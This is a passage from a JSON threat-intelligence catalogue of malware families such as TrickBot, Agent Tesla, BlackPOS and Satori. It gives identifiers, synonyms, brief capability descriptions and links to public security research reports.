"https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
"https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
"https://objective-see.com/blog/blog_0x1D.html",
"https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
"https://objective-see.com/blog/blog_0x1F.html",
"https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
"https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
"https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf"
]
}
},
{
"uuid": "b8e87440-6005-459c-9a20-35516ce2fa5b",
"value": "Lazarus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/"
]
}
},
{
"uuid": "bd29030e-d440-4842-bc2a-c173ed938da4",
"value": "Spedear",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c",
"value": "FireMalv",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea",
"value": "Jasus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
"value": "Pwnet",
"description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/"
]
}
},
{
"uuid": "c824813c-9c79-4917-829a-af72529e8329",
"value": "TrickBot",
"description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.",
"meta": {
"synonyms": [
"Trickster",
"TheTrick",
"TrickLoader"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
"https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
"http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
"https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
"https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
"https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
"https://www.youtube.com/watch?v=KMcSAlS9zGE",
"https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/",
"http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
"https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
"https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
"https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
"https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
"https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
"https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
"https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets",
"https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
"https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
"https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
"https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
"http://www.malware-traffic-analysis.net/2018/02/01/",
"http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
"http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
"https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
"http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
"https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core",
"https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
"https://www.youtube.com/watch?v=EdchPEHnohw",
"https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
"https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
"https://www.youtube.com/watch?v=lTywPmZEU1A",
"https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer",
"https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
"https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/"
]
}
},
{
"uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573",
"value": "ATI-Agent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
]
}
},
{
"uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6",
"value": "c0d0so0",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2",
"value": "Manifestus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/811587154983981056"
]
}
},
{
"uuid": "70459959-5a20-482e-b714-2733f5ff310e",
"value": "KLRD",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
"https://www.morphick.com/resources/news/klrd-keylogger"
]
}
},
{
"uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
"value": "SMSspy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "19d89300-ff97-4281-ac42-76542e744092",
"value": "Helminth",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
"https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
]
}
},
{
"uuid": "9803b201-28e5-40c5-b661-c1a191388072",
"value": "ScreenLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/791535679905927168"
]
}
},
{
"uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f",
"value": "Loda",
"description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
"meta": {
"synonyms": [
"Nymeria"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
"https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/"
]
}
},
{
"uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
"value": "Roaming Mantis",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
"https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
]
}
},
{
"uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93",
"value": "Buzus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
"value": "Prikorma",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf"
]
}
},
{
"uuid": "0404cb3e-1390-4010-a368-80ee585ddd59",
"value": "Dented",
"description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse SOCKS5, Tor and VNC can be added.",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9",
"value": "Cuegoe",
"description": "",
"meta": {
"synonyms": [
"Windshield?"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451",
"http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
"https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal"
]
}
},
{
"uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e",
"value": "CMSTAR",
"description": "",
"meta": {
"synonyms": [
"meciv"
],
"type": [],
"refs": [
"https://twitter.com/ClearskySec/status/963829930776723461",
"https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
]
}
},
{
"uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff",
"value": "Machete",
"description": "",
"meta": {
"synonyms": [
"El Machete"
],
"type": [],
"refs": [
"https://securelist.com/el-machete/66108/",
"https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
"https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6"
]
}
},
{
"uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c",
"value": "ChChes",
"description": "",
"meta": {
"synonyms": [
"Ham Backdoor"
],
"type": [],
"refs": [
"https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
"https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
"https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
]
}
},
{
"uuid": "1e62fc1f-daa7-416f-9159-099798bb862c",
"value": "BlackPOS",
"description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up-to-date operating systems and antivirus programs to prevent security breaches, or if the computer database systems have weak administration login credentials.",
"meta": {
"synonyms": [
"Reedum",
"POSWDS",
"Kaptoxa"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
]
}
},
{
"uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c",
"value": "Tyupkin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.lastline.com/labsblog/tyupkin-atm-malware/"
]
}
},
{
"uuid": "f44e6d03-54c0-47af-b228-0040299c349c",
"value": "Dexter",
"description": "",
"meta": {
"synonyms": [
"LusyPOS"
],
"type": [],
"refs": [
"https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
"https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
"https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf",
"https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information",
"https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/"
]
}
},
{
"uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0",
"value": "Spamtorte",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/"
]
}
},
{
"uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906",
"value": "Swift?",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
]
}
},
{
"uuid": "7007b268-f6f4-4a01-9184-fc2334461c38",
"value": "SysScan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
"value": "InvisiMole",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
]
}
},
{
"uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98",
"value": "Excalibur",
"description": "",
"meta": {
"synonyms": [
"Sabresac",
"Saber"
],
"type": [],
"refs": [
"https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
]
}
},
{
"uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965",
"value": "r980",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/"
]
}
},
{
"uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5",
"value": "Miancha",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
]
}
},
{
"uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26",
"value": "soraya",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/"
]
}
},
{
"uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae",
"value": "XP PrivEsc (CVE-2014-4076)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
]
}
},
{
"uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83",
"value": "Abbath Banker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "10d0115a-00b4-414e-972b-8320a2bb873c",
"value": "DoubleLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/"
]
}
},
{
"uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
"value": "Hide and Seek",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
"https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/"
]
}
},
{
"uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66",
"value": "CadelSpy",
"description": "",
"meta": {
"synonyms": [
"Cadelle"
],
"type": [],
"refs": [
"http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
]
}
},
{
"uuid": "e3065e43-503b-4496-921b-7601dd3d6abd",
"value": "Auriga",
"description": "",
"meta": {
"synonyms": [
"Riodrv"
],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d",
"value": "DarkMegi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html",
"http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html"
]
}
},
{
"uuid": "28c13455-7f95-40a5-9568-1e8732503507",
"value": "KeyBoy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
]
}
},
{
"uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d",
"value": "AbaddonPOS",
"description": "",
"meta": {
"synonyms": [
"PinkKite"
],
"type": [],
"refs": [
"https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/",
"https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak"
]
}
},
{
"uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e",
"value": "Marcher",
"description": "",
"meta": {
"synonyms": [
"ExoBot"
],
"type": [],
"refs": [
"https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
"https://www.clientsidedetection.com/marcher.html",
"https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html"
]
}
},
{
"uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5",
"value": "NetC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e",
"value": "Rockloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware"
]
}
},
{
"uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
"value": "Lazarus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
"https://twitter.com/PhysicalDrive0/status/828915536268492800",
"http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
"https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html"
]
}
},
{
"uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972",
"value": "KrDownloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework"
]
}
},
{
"uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142",
"value": "CpuMeaner",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/"
]
}
},
{
"uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
"value": "Adylkuzz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar"
]
}
},
{
"uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3",
"value": "TDTESS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/tulip/"
]
}
},
{
"uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
"value": "TinyZbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65",
"value": "Bateleur",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
]
}
},
{
"uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
"value": "Satori",
"description": "Satori is a variant of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploits to exhibit worm-like behaviour, spreading over ports 37215 and 52869 (CVE-2014-8361).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
"https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
"http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
"https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
"http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori"
]
}
},
{
"uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7",
"value": "Urausy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6",
"value": "ManItsMe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8",
"value": "BlackRevolution",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/"
]
}
},
{
"uuid": "64b34624-37de-4c51-8856-e721e31e67db",
"value": "Mokes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8",
"value": "tDiscoverer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
]
}
},
{
"uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca",
"value": "Project Alice",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/"
]
}
},
{
"uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9",
"value": "AlphaNC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
]
}
},
{
"uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063",
"value": "Grateful POS",
"description": "POS malware targets systems that run physical point-of-sale devices and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card's magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system's memory unencrypted while the system determines where to send it for authorization. \r\nMasquerading as the LogMeIn software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with a low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was uploaded in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html",
"https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season"
]
}
},
{
"uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
"value": "Konni",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
"https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
"https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
"http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html"
]
}
},
{
"uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
"value": "Rootnik",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
"https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
]
}
},
{
"uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544",
"value": "Unidentified APK 002",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380",
"value": "Agent Tesla",
"description": "A .NET-based keylogger and RAT readily available to actors. It logs keystrokes and the host's clipboard and beacons this information back to the C2.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
"https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
"https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
"https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
"https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
"https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting"
]
}
},
{
"uuid": "541b64bc-87ec-4cc2-aaee-329355987853",
"value": "FinFisher RAT",
"description": "",
"meta": {
"synonyms": [
"FinSpy"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
"https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html",
"https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
"http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
"https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"
]
}
},
{
"uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625",
"value": "Heloag",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/",
"https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/"
]
}
},
{
"uuid": "d91c4184-608e-47b1-b746-0e98587e2455",
"value": "Ploutus ATM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html",
"http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html"
]
}
},
{
"uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f",
"value": "Cryakl",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
"https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware",
"https://hackmag.com/security/ransomware-russian-style/",
"https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx"
]
}
},
{
"uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed",
"value": "DMA Locker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/",
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/",
"https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/"
]
}
},
{
"uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685",
"value": "Computrace",
"description": "",
"meta": {
"synonyms": [
"lojack"
],
"type": [],
"refs": [
"https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
"https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
"https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
"https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research"
]
}
},
{
"uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c",
"value": "KasperAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
"https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
]
}
},
{
"uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc",
"value": "Chir",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba",
"value": "FindPOS",
"description": "",
"meta": {
